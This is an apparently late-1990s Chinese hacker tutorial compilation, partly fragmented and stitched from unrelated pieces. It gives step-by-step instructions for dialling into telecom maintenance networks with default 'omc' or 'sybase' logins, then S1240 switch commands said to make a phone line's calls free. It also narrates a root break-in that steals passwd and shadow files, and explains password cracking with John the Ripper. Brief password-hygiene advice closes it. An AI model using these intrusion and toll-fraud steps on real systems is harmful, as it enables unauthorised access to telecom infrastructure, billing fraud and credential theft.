一.通用入口
因 形 勢 發 展 需 要, 大 多 地 縣 一 級 電 信 局 都 成 立 了 網 路 管
理、 交 換 維 護 中 心,負 責 本 地 區 的 話 務 分 析 及 交 換 維 護。
顧 名 思 義, 這 兩 個 機 構 都 通 過 各 種 傳 輸 手 段 和 該 地 區 所 有
被 監 控 的 交 換 機 連 通。 以 ANONYMOUS 局 來 說 吧, 該 局 網
管 中 心 建 了 一 個 FDDI IntraNET, 通 過 交 換 機 的 人 機 命 令 口
傳 來 的 話 務 數 據 進 行 網 絡 的 質 量 分 析, 交 換 傳 輸 維 護 中 心
也 建 立 了 一 個 IEEE.802.3 的 以 太 網, 也 和 交 換 機 相 連, 負 責
交 換 機 的 日 常 維 護。 這 兩 個 中 心 用 路 由 器 相 互 聯 結, 再 連
上 環 境 監 控 設 備, 就 實 現 了 所 謂 的 機 房 無 人 值 守。 (兄 千 萬
不 要 爬 窗 撬 門 到 無 人 值 守 的 機 房 去 哦 :-) ) 而 有 些 局 則 為 了
方 便 技 術 人 員 的 方 便, 另 外 架 設 撥 號 服 務 器, 這 樣 工 作 人
員 就 可 以 在 任 何 地 方 維 護 到 交 換 機 了。 (該 點 眼 藥 水 了 休
息) 兄 一 定 笑 了, 說 了 半 天, 到 這 兒 還 不 是 看 我 ???? 的 H 的
水 平 嗎? .... Bingo!
但 你 一 定 要 先 摸 清 ppp 的 接 入 電 話 號 碼。 至 于 用 戶 名 嘛,
各 地 不 定, 但 很 多 地 方 是 用 omc (Operator & Maintenance
Center) 的, 而 且 架 這 些 intranet 的 人 員 往 往 在 安 全 方 面 不 是
專 家。 (不 包 括 弟 哦?。?-)
在 進 去 以 后, 先 ping 自 己, 知 道 ip 后, (eg. 192.130.5.30) 就 開 始
找 接 交 換 機 的 前 臺 機 了: telnet 192.130.5.2(3,4,5,6,7...30) Be
patient!
Unix 4.0
login:omc
password:<ENTER>
Succ.....
恭 喜! 你 進 去 了。 如 omc 加 了 密 碼, 試 試 sybase, 一 般 sybase
沒 有 密 碼。 進 去 后, 就 看 老 兄 的 啦!
二.S1240簡介
進 入 系 統 以 后, 別 忘 了 先 w 一 下 哦, 否 則 給 人 kill 了, 以 后
加 了 密 碼, 就 沒 得 玩 嘍!
%cd /u/omc/bin
%mpt
就 進 維 護 菜 單 了, 按 (1...n) 選 擇 對 哪 個 局 進 行 維 護。 進 了 交
換 機 的 維 護 端 口 (mptmon) 后 看 到 的 是 > 提 示 符, 有 點 象 dos ?
:-) yeah.
現 在 的 s1240 有 兩 種 版 本 (E & J) family, 兩 種 版 本 命 令 有 些 差
別, 我 們 先 來 鑒 別 一 下:
>MM <ENTER>
TRAIN OCT-11-96 WED (TRAIN 這 兒 顯 示 的 是 局 名, 各 地 不 一)
<
這 是 E family.
>MM
TRAIN
<88:dn=k'5757011;
在 報 告 中 系 統 會 告 訴 你 這 個 電 話 的 物 理 地 址
EN=h'XXX&YYY; 記 住! 下 面 有 用。
>MM
TRAIN
<378:1="R_OLCOS",2="D_TN"&0&"YYY",3="D_CHRGINF"&0&"40",NA=H'XXX;
從 此 以 后, 該 電 話 市 話 FREE!
注 解: 那 要 看 你 那 里 是 不 是 撥 號 上 網 的, 不 過 好 多 地 方 都
是 走 分 組 交 換 網, 是 專 線。
另 外, 那 個 改 市 話 的 方 法 有 幾 點 注 意 事 項:
1. 只適用于老版本交換機;
2. IF 1 IS TRUE
IF 該交換局是長市合一局
THEN 長途也FREE了,哈哈
示例二:
我 是 ??????, 前 段 日 子, 我 們 曾 邀 請 ISS 公 司 創 始 人
Christopher Klaus 先 生 (就 是 您 說 的 那 位 少 年 黑 客, 曾 進 入 美
國 國 防 部 和 NASA, 現 年 22 歲) 來 北 京 昆 侖 飯 店 和 上 海 新 錦
江 講 座, 由 于 公 安 部 的 干 預, 沒 有 進 行 市 場 宣 傳 和 安 排 新
聞 報 道, 只 是 邀 請 了 國 家 有 關 部 委 和 金 融 界 有 關 人 士 參
加。
至 于 網 絡 安 全 漏 洞, 經 對 方 允 許, 我 曾 經 對 郵 電 部 和 清 華
BBS (未 移 植 到 曙 光 天 演 之 前) 和 某 銀 行 青 島 分 行 進 行 掃
描, 最 近 一 次 的 結 果 是 郵 電 部 沒 有 高 風 險 漏 洞 (當 然, 中 低
風 險 的 漏 洞 還 是 不 少), 清 華 BBS 服 務 器 有 三 個 高 風 險 漏
洞, 而 某 銀 行 已 被 我 拿 到 超 級 用 戶 口 令。 ISS 的 看 法 是 很
多 網 絡 安 全 漏 洞 都 是 由 于 配 置 不 當 造 成 的, 在 動 態 的 網 絡
環 境 中 管 理 人 員 難 免 不 出 差 錯, 因 此, ISS 于 97 年 提 出 可
適 應 性 安 全 管 理 模 型。
當 然, 77% 的 攻 擊 行 為 是 內 部 人 員 配 合 黑 客 造 成 的。 然
而, 在 內 部 人 員 的 配 合 下, 在 中 國 拿 到 一 些 口 令 是 相 當 的
容 易 (前 幾 年 我 開 發 數 據 庫 系 統, 問 用 戶 口 令 幾 乎 是 有 問
必 答), 這 也 說 明 這 樣 一 個 問 題 就 是 我 們 國 家 的 網 絡 安 全 意
識 薄 弱。
ISS 有 一 套 很 好 的 網 絡 安 全 產 品 和 解 決 思 路, 已 經 加 入 了
Internet 網 絡 安 全 系 統 聯 合 領 導 委 員 會, 同 CRET, NCSA 共 同
研 究 網 絡 攻 擊 手 段。 我 真 誠 希 望 能 夠 同 您 共 同 研 究 這 套 產
品 的 網 絡 攻 防 手 段, 并 且 針 對 黑 客 攻 擊 的 技 巧, 特 點 及 思
路 向 您 請 教, 希 望 您 幫 忙 并 多 聯 系。
示例三:
這 個 好 象 有 點 搞 笑, 哈 哈!
我 解 開 的 網 頁 是 STUPID.HK.????, 具 體 步 驟 如 下:
我 的 目 標 是: PUBLIC.HK.????, 可 以 GET PASSWD, CANT GOT
SHADOW, 于 是 我 GET 了 它 的 HOSTS 文 件, 試 圖 找 出 它 的 關
聯, 發 現 STUPID.HK.???? STUPID, TELNET TOTHERE:
USER:STUPID
PASSWD:STUPID CANT JION.
USER:ROOT
PASSWD:STUPID GOOD!I GOT IT.THE FOOL ROOT!
CD /ETC
GET PASSWD & GET SHADOW
USE UNSHADOW PASS2DIS BURTE,N:WEBMASTER
P:WEBMASTER ...
以 上 是 全 過 程, 希 望 有 參 考 價 值
示例四:口令攻擊術
黑 客 攻 擊 目 標 時, 常 常 把 破 譯 普 通 用 戶 的 口 令 作 為 攻 擊 的
開 始。 先 用 finger 遠 端 主 機 名 找 出 主 機 上 的 用 戶 帳 號, 然 后
就 采 用 字 典 窮 舉 法 進 行 攻 擊。 它 的 原 理 是 這 樣 的: 網 絡 上
的 用 戶 常 采 用 一 個 英 語 單 詞 或 自 己 的 姓 氏 作 為 口 令。 通 過
一 些 程 序, 自 動 地 從 電 腦 字 典 中 取 出 一 個 單 詞, 作 為 用 戶 的
口 令 輸 入 給 遠 端 的 主 機, 申 請 進 入 系 統。 若 口 令 錯 誤, 就 按
序 取 出 下 一 個 單 詞, 進 行 下 一 個 嘗 試。 并 一 直 循 環 下 去, 直
到 找 到 正 確 的 口 令 或 字 典 的 單 詞 試 完 為 止。 由 于 這 個 破 譯
過 程 由 計 算 機 程 序 來 自 動 完 成, 幾 個 小 時 就 可 以 把 字 典 的
所 有 單 詞 都 試 一 遍。 這 類 程 序 的 典 型 是 LetMeIn version 2.0。
若 這 種 方 法 不 能 奏 效, 黑 客 就 會 仔 細 尋 找 目 標 的 薄 弱 環 節
和 漏 洞, 伺 機 奪 取 目 標 中 存 放 口 令 的 文 件 shadow 或 passwd。
因 為 在 現 代 的 Unix 操 作 系 統 中, 用 戶 的 基 本 信 息 存 放 在
passwd 文 件 中, 而 所 有 的 口 令 則 經 過 DES 加 密 方 法 加 密 后 專
門 存 放 在 一 個 叫 shadow (影 子) 的 文 件 中, 并 處 于 嚴 密 的 保 護
之 下。 老 版 本 的 Unix 沒 有 shadow 文 件, 它 所 有 的 口 令 都 存 放
在 passwd 文 件 中。 一 旦 奪 取 口 令 文 件, 黑 客 們 就 會 用 專 解
DES 加 密 法 的 程 序 來 解 口 令。
好, 首 先 先 讓 我 們 把 Unix 口 令 的 可 能 值 統 計 一 下:
Unix 一 共 是 [0x00~0xff] 共 128 個 字 符, 小 于 0x20 的 都 算 是 控 制
符, 不 能 輸 入 為 口 令, 0x7f 為 轉 義 符, 不 能 輸 入。 那 么 總 共 有
128 - 32 - 1 = 95 個 字 符 可 作 為 口 令 的 字 符。
也 就 是 10(數 字) + 33(標 點 符 號) + 26*2(大 小 寫 字 母) = 95 個
如 果 passwd 取 任 意 5 個 字 母 + 1 位 數 字 或 符 號 (按 順 序), 可 能
性 是 52*52*52*52*52*43=16,348,773,000 (163 億 種 可 能 性)
但 如 果 5 個 字 母 是 一 個 常 用 詞, 估 算 一 下 設 常 用 詞 5000 條, 從
5000 個 常 用 詞 中 取 一 個 詞 與 任 意 一 個 字 符 組 合 成 口 令, 即
5000*(2*2*2*2*2)(大小寫)*43=6,880,000 (688 萬 種 可 能 性)。
注: 實 際 情 況 下 絕 大 多 數 人 都 只 用 小 寫 字 符, 可 能 性 還 要
小。
但 這 已 經 可 以 用 微 機 進 行 窮 舉 了, 在 Pentium 200 上 每 秒 可 算
3、4 萬 次, 象 這 樣 簡 單 的 口 令 要 不 了 3 分 鐘。 如 果 有 人 用
P200 算 上 一 周, 將 可 進 行 200 億 次 攻, 所 以 6 位 口 令 是 很 不 可
靠 的, 至 少 要 用 7 位。
可 惜 很 多 用 戶 確 實 是 這 么 設 passwd 的。 以 上 只 是 粗 略 估 算
常 見 的 一 種 情 況, 實 際 情 況 還 要 復 雜, 主 要 是 根 據 用 戶 取 口
令 格 式 的 變 化 而 變 化。 那 些 hacker 并 不 需 要 所 有 人 的 口 令,
他 們 得 到 幾 個 用 戶 口 令 就 能 獲 取 系 統 的 控 制 權, 所 以 取 口
令 過 于 簡 單 是 對 系 統 安 全 的 不 負 責。
以 下 舉 個 解 密 碼 程 序 的 例 子:
John The Ripper 1.4
這 個 軟 件 由 著 名 的 黑 客 組 織 -- UCF 出 的, 它 支 持 Unix, Dos,
Windows, 速 度 超 快, 可 以 說 是 目 前 同 類 中 最 杰 出 的 作 品。 對
于 老 式 的 passwd 檔 (就 是 沒 shadow 的 那 種, 任 何 人 能 看 的 都 可
以 把 passwd 密 文 存 下 來), John 可 以 直 接 讀 取 并 用 字 典 窮 舉 擊
破。 對 于 現 代 的 passwd + shadow 的 方 式, John 提 供 了
UNSHADOW 程 序 直 接 把 兩 者 合 成 出 老 式 passwd 文 件。
John 的 用 法 簡 介:
1.JOHN -P:PASSWD -W:WORDLIST
WORDLIST 是 字 典 文 件。
PASSWD 是 你 拿 到 的 密 碼 文 件。
2.沒 有 字 典 檔 時, 在 John 的 配 置 文 件 --> john.ini 里, 有 密 碼
長 度 和 字 母、 數 字、 符 號 的 設 置, 設 好 后 就 自 動 在 內
存 里 生 成 密 碼 去 找。 這 樣 你 用 軟 盤 也 可 以, 但 機 器 的
速 度 一 定 要 快。
3.用 暴 力 法 破 密 碼 時 使 用 參 數 -i:all
格 式 為 JOHN -I:ALL -P:PASSWD
就 可 破 象 5e5t56e6 這 樣 的 密 碼 了。
這 樣 可 以 產 生 A----ZZZZZZZZ 的 密 碼, 不 過 時 間 ... 嘿 嘿 ....
4.當 破 解 到 一 半 因 種 種 原 因 需 要 暫 時 停 止 破 解, 按
ctrl+c, 下 次 破 解 不 必 從 新 來 過, 只 要 john -restore:restore
即 可 接 著 破。
john 在 純 dos 下 要 比 在 win95 下 快, 用 unix 更 快。
5.對 于 象 a2e4u7 的 密 碼 是 很 難 破 出 的, 但 JOHN 的
INCREMENTAL (漸 進) 方 式 的 密 碼 組 合 引 入 了 一 些 字 母
的 頻 率 統 計 信 息, 即 “高 頻 先 試” 的 原 則, 倒 是 有 些
啟 發 意 義。
在 JOHN.INI 中 INCREMENTAL 中 的 B, M, E 各 行 意 思 如
下:
B...Begin M...Middle E...End
如 想 要 加 一 種 方 式, 比 如 字 母 加 數 字, 可 以 設 成
[Incremental:a1]
CharCount = 36 (字 符 的 個 數, 這 兒 是 26 個 字 母 + 10 個 數 字)
MinLen = 8 (passwd 的 最 小 長 度)
MaxLen = 8 (passwd 的 最 大 長 度)
CharsetB = 1203984567smcbtdpajrhflgkwneiovyzuqx
CharsetM = 1203984567eaiornltsuchmdgpkbyvwfzxjq
CharsetE = 1203984567erynsatldoghikmcwpfubzjxvq
加 在 john.ini 里, 執 行 是 incremental 參 數 選 a1 就 行 了。
6.按 Ctrl-C 中 止 運 行 時, 輸 出 是 這 樣:
v: 18 c: 1295458688 t: 1:14:28:08 9% c/s: 11036 w: oentl - obftl
v: 0 c: 5424000 s: 862 c/s: 6292 w: fbymgf
V: 是 Victory, 是 破 解 成 功 的 個 數, 因 為 俺 運 行 一 段
后, 破 解 了 2 個 密 碼, 顯 示 了 V:2, 后 來 又 破 了 幾 個,
V 后 面 的 數 字 也 相 應 變 化。
C: Compare, 是 比 較 的 次 數。
T: time, 程 序 已 運 行 了 多 長 時 間。
9%: 當 前 完 成 度. 至 100% 即 全 部 完 成。
c/s: 是 每 秒 比 較 的 次 數, 隨 機 器 性 能 的 高 低 而 變 化。
W: 是 當 前 正 在 試 的 一 個 word, 這 個 word 可 能 位 于 你 的
字 典 中 (如 果 你 用 字 典 的 話) 或 是 john 產 生 的。 根 據
W 所 報 告 的 數 字 可 以 估 計 破 解 到 什 么 地 方 了。
7.運 行 需 要 的 字 典 可 以 在 internet 上 下 載 別 人 已 做 好 的,
如:
ftp.cads.com.tw 在 /pub/security 下 的 DICT.ZIP
ftp.uni-koeln.de /pub/dictionaries/
ftp.ox.ac.uk /pub/wordlists
也 可 以 自 己 做, 用 txt2dict 或 pass2dic 等 專 用 工 具 可 自 動
把 英 語 文 件 轉 換 成 字 典。
防 范 的 辦 法
防 范 的 辦 法 很 簡 單, 只 要 使 自 己 的 口 令 不 在 英 語 字 典 中, 且
不 可 能 被 別 人 猜 測 出 就 可 以 了。 一 個 好 的 口 令 應 當 至 少 有
7 個 字 符 長, 不 要 用 個 人 信 息 (如 生 日, 名 字 等), 口 令 中 要 有 一
些 非 字 母 (如 數 字, 標 點 符 號, 控 制 字 符 等), 還 要 好 記 一 些, 不
能 寫 在 紙 上 或 計 算 機 中 的 文 件 中, 選 擇 口 令 的 一 個 好 方 法
是 將 兩 個 不 相 關 的 詞 用 一 個 數 字 或 控 制 字 符 相 連, 并 截 斷
為 8 個 字 符。 例 如 我 以 前 的 口 令 是 me2.hk97 。
保 持 口 令 安 全 的 要 點 如 下:
* 不 要 將 口 令 寫 下 來。
* 不 要 將 口 令 存 于 電 腦 文 件 中。
* 不 要 選 取 顯 而 易 見 的 信 息 作 口 令。
* 不 要 讓 別 人 知 道。
* 不 要 在 不 同 系 統 上 使 用 同 一 口 令。
* 為 防 止 眼 明 手 快 的 人 竊 取 口 令, 在 輸 入 口 令 時 應
確 認 無 人 在 身 邊。
* 定 期 改 變 口 令, 至 少 6 個 月 要 改 變 一 次。
最 后 這 點 是 十 分 重 要 的, 永 遠 不 要 對 自 己 的 口 令 過 于 自 信,
也 許 就 在 無 意 當 中 泄 露 了 口 令。 定 期 地 改 變 口 令, 會 使 自
己 遭 受 黑 客 攻 擊 的 風 險 降 到 了 一 定 限 度 之 內。 一 旦 發 現 自
己 的 口 令 不 能 進 入 計 算 機 系 統, 應 立 即 向 系 統 管 理 員 報 告,
由 管 理 員 來 檢 查 原 因。
系 統 管 理 員 也 應 定 期 運 行 這 些 破 譯 口 令 的 工 具, 來 嘗 試 破
譯 shadow 文 件, 若 有 用 戶 的 口 令 密 碼 被 破 譯 出, 說 明 這 些 用
戶 的 密 碼 取 得 過 于 簡 單 或 有 規 律 可 循, 應 盡 快 地 通 知 他 們,
及 時 更 正 密 碼, 以 防 止 黑 客 的 入 侵。
